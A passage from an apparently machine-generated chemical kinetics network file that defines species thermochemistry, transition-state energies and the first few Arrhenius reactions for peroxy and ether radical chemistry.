E0 = (-427.353,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.106634,0.0787705,-6.2667e-05,1.74188e-08,7.03891e-13,-51240.8,30.9202], Tmin=(100,'K'), Tmax=(1034.46,'K')), NASAPolynomial(coeffs=[20.2829,0.0205394,-8.11534e-06,1.52229e-09,-1.08858e-13,-56562,-73.4686], Tmin=(1034.46,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-427.353,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCsJOCs)"""),
)
species(
label = 'C=COCC([O])OO(3939)',
structure = SMILES('C=COCC([O])OO'),
E0 = (-248.355,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0136128,0.0846548,-8.62939e-05,4.40981e-08,-8.92105e-12,-29722.7,30.578], Tmin=(100,'K'), Tmax=(1197.6,'K')), NASAPolynomial(coeffs=[18.0395,0.0243577,-1.0772e-05,2.05774e-09,-1.4515e-13,-34046.8,-59.7732], Tmin=(1197.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-248.355,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + radical(CCOJ)"""),
)
species(
label = 'CC1OCC1([O])OO(3633)',
structure = SMILES('CC1OCC1([O])OO'),
E0 = (-213.885,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.553262,0.0629183,-1.7997e-05,-3.32558e-08,2.16435e-11,-25588.2,25.2702], Tmin=(100,'K'), Tmax=(898.543,'K')), NASAPolynomial(coeffs=[18.4636,0.0188428,-3.94022e-06,4.76356e-10,-2.86769e-14,-30246.2,-67.2302], Tmin=(898.543,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-213.885,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(345.051,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsCsOsOs) + group(Cs-CsCsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + ring(Oxetane) + radical(CC(C)(O)OJ)"""),
)
species(
label = 'C[CH]OCC([O])([O])O(3940)',
structure = SMILES('C[CH]OCC([O])([O])O'),
E0 = (-181.943,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.151728,0.101261,-0.000183981,1.79278e-07,-6.53856e-11,-21760,32.9904], Tmin=(100,'K'), Tmax=(870.06,'K')), NASAPolynomial(coeffs=[3.4711,0.0469432,-2.29994e-05,4.33389e-09,-2.92803e-13,-20859.3,25.9341], Tmin=(870.06,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-181.943,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsOsOsOs) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]OCC(=O)OO(3620)',
structure = SMILES('C[CH]OCC(=O)OO'),
E0 = (-427.353,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.106634,0.0787705,-6.2667e-05,1.74188e-08,7.03891e-13,-51240.8,30.9202], Tmin=(100,'K'), Tmax=(1034.46,'K')), NASAPolynomial(coeffs=[20.2829,0.0205394,-8.11534e-06,1.52229e-09,-1.08858e-13,-56562,-73.4686], Tmin=(1034.46,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-427.353,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCsJOCs)"""),
)
species(
label = '[O]C[C]([O])OO(1290)',
structure = SMILES('[O]C[C]([O])OO'),
E0 = (111.532,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2750,2850,1437.5,1250,1305,750,350,180,1072.1,1072.24],'cm^-1')),
HinderedRotor(inertia=(0.136972,'amu*angstrom^2'), symmetry=1, barrier=(3.14926,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.136788,'amu*angstrom^2'), symmetry=1, barrier=(3.14502,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.13727,'amu*angstrom^2'), symmetry=1, barrier=(3.15612,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (91.0428,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.75747,0.0632199,-0.000128884,1.36882e-07,-5.32443e-11,13481.5,24.8972], Tmin=(100,'K'), Tmax=(849.128,'K')), NASAPolynomial(coeffs=[0.650466,0.0346903,-1.88763e-05,3.71198e-09,-2.57149e-13,14886,37.2201], Tmin=(849.128,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(111.532,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(195.39,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + radical(CCOJ) + radical(CCOJ) + radical(Cs_P)"""),
)
species(
label = '[CH]C(32)',
structure = SMILES('[CH]C'),
E0 = (351.472,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,431.535,1804.51],'cm^-1')),
HinderedRotor(inertia=(0.000906356,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (28.0532,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.73285,-0.000244773,3.59198e-05,-4.44289e-08,1.65887e-11,42287.5,7.078], Tmin=(100,'K'), Tmax=(940.479,'K')), NASAPolynomial(coeffs=[5.42969,0.0081677,-2.4253e-06,4.22642e-10,-3.09417e-14,41277.1,-4.6789], Tmin=(940.479,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(351.472,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(128.874,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJ2_triplet)"""),
)
species(
label = '[O]O(16)',
structure = SMILES('[O]O'),
E0 = (-8.19602,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1036.72,2034.11,2034.11],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (33.0067,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(892.977,'J/mol'), sigma=(3.458,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.04595,-0.00173474,1.0377e-05,-1.02207e-08,3.3493e-12,-986.755,4.63579], Tmin=(100,'K'), Tmax=(932.129,'K')), NASAPolynomial(coeffs=[3.21022,0.00367946,-1.27704e-06,2.18051e-10,-1.46343e-14,-910.359,8.18305], Tmin=(932.129,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.19602,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsH) + group(O2s-OsH) + radical(HOOJ)"""),
)
species(
label = 'C[CH]OC[C][O](3848)',
structure = SMILES('C[CH]OC[C][O]'),
E0 = (433.949,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (86.0892,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.841067,0.077601,-0.000127223,1.13628e-07,-3.95063e-11,52298,24.0656], Tmin=(100,'K'), Tmax=(843.113,'K')), NASAPolynomial(coeffs=[7.68677,0.0296787,-1.44869e-05,2.75808e-09,-1.88857e-13,51692.5,-4.53748], Tmin=(843.113,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(433.949,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(266.063,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-CsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CH2_triplet) + radical(CCsJOCs) + radical(CCOJ)"""),
)
species(
label = '[CH2]O[CH]C(415)',
structure = SMILES('[CH2]O[CH]C'),
E0 = (132.402,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,3025,407.5,1350,352.5,345.442,350.885],'cm^-1')),
HinderedRotor(inertia=(0.00137711,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00140962,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.101356,'amu*angstrom^2'), symmetry=1, barrier=(8.57158,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.21733,0.0353185,-2.34142e-05,4.36902e-09,1.39093e-12,15992,16.6888], Tmin=(100,'K'), Tmax=(965.91,'K')), NASAPolynomial(coeffs=[9.14855,0.0150973,-5.18412e-06,8.78107e-10,-5.86112e-14,14257.3,-18.5582], Tmin=(965.91,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(132.402,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(220.334,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-OsHHH) + radical(CCsJOCs) + radical(CsJOCC)"""),
)
species(
label = '[O][C]OO(1370)',
structure = SMILES('[O][C]OO'),
E0 = (348.911,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,180,180],'cm^-1')),
HinderedRotor(inertia=(1.48901,'amu*angstrom^2'), symmetry=1, barrier=(34.2353,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(1.49006,'amu*angstrom^2'), symmetry=1, barrier=(34.2594,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (61.0168,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.49389,0.0282223,-2.75673e-05,9.42814e-09,-3.53743e-13,42022.8,13.2753], Tmin=(100,'K'), Tmax=(1048.36,'K')), NASAPolynomial(coeffs=[11.8829,0.000970194,-8.39185e-07,2.30595e-10,-2.0299e-14,39583.2,-34.7114], Tmin=(1048.36,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(348.911,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(99.7737,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-OsOsHH) + radical(OCOJ) + radical(CH2_triplet)"""),
)
species(
label = '[CH3](11)',
structure = SMILES('[CH3]'),
E0 = (135.382,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([570.572,1408.13,1408.49,4000,4000,4000],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.91547,0.00184154,3.48742e-06,-3.32748e-09,8.49957e-13,16285.6,0.351741], Tmin=(100,'K'), Tmax=(1337.63,'K')), NASAPolynomial(coeffs=[3.54146,0.00476787,-1.82148e-06,3.28877e-10,-2.22546e-14,16224,1.66035], Tmin=(1337.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(135.382,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo library: primaryThermoLibrary + radical(CH3)"""),
)
species(
label = '[CH]OC[C]([O])OO(2666)',
structure = SMILES('[CH]OC[C]([O])OO'),
E0 = (367.561,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2750,2850,1437.5,1250,1305,750,350,200,800,960,1120,1280,1440,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (104.061,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.662505,0.0860301,-0.000160894,1.55501e-07,-5.70173e-11,44315.4,29.135], Tmin=(100,'K'), Tmax=(838.014,'K')), NASAPolynomial(coeffs=[6.07399,0.0332493,-1.81785e-05,3.5901e-09,-2.49745e-13,44354.7,9.63029], Tmin=(838.014,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(367.561,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(236.962,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-OsHHH) + radical(CCOJ) + radical(CH2_triplet) + radical(Cs_P)"""),
)
species(
label = 'C[C]OC[C]([O])OO(3941)',
structure = SMILES('C[C]OC[C]([O])OO'),
E0 = (330.013,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.134859,0.102807,-0.000175874,1.62353e-07,-5.83898e-11,39828.9,32.7291], Tmin=(100,'K'), Tmax=(819.709,'K')), NASAPolynomial(coeffs=[8.31294,0.0398883,-2.10383e-05,4.13781e-09,-2.88842e-13,39172.8,-1.90128], Tmin=(819.709,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(330.013,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CH2_triplet) + radical(Cs_P) + radical(CCOJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.64289,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53101,-0.000123661,-5.02999e-07,2.43531e-09,-1.40881e-12,-1046.98,2.96747], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.95258,0.0013969,-4.92632e-07,7.8601e-11,-4.60755e-15,-923.949,5.87189], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-8.64289,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'He',
structure = SMILES('[He]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (4.0026,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(84.8076,'J/mol'), sigma=(2.576,'angstroms'), dipoleMoment=(0,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""He""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ar',
structure = SMILES('[Ar]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (39.348,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1134.93,'J/mol'), sigma=(3.33,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ar""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (175.156,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (117.597,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (183.055,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (238.978,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (215.377,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (184.653,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (203.661,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (153.064,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (129.443,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (142.994,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (110.275,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (409.049,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (232.18,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (420.385,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (441.742,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (472.875,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (112.881,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (57.8491,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS22',
E0 = (57.7654,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS23',
E0 = (144.167,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS24',
E0 = (49.4811,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS25',
E0 = (468.17,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS26',
E0 = (430.92,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS27',
E0 = (515.63,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS28',
E0 = (537.258,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS29',
E0 = (541.818,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['C[CH]OC[C]([O])OO(3631)'],
products = ['[CH2]C(=O)OO(1167)', 'CC=O(606)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['C[CH]O[CH]C(=O)OO(3928)', 'H(8)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(8.22e+08,'cm^3/(mol*s)'), n=1.533, Ea=(84.5736,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 192 used for Cd_R;HJ
Exact match found for rate rule [Cd_R;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond
Ea raised from 80.6 to 84.6 kJ/mol to match endothermicity of reaction."""),
)
reaction(
label = 'reaction3',
reactants = ['C=COC[C]([O])OO(1305)', 'H(8)'],
products = ['C[CH]OC[C]([O])OO(3631)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(6.67e+12,'cm^3/(mol*s)'), n=0.1, Ea=(6.4601,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 2816 used for Cds-HH_Cds-OsH;HJ
Exact match found for rate rule [Cds-HH_Cds-OsH;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
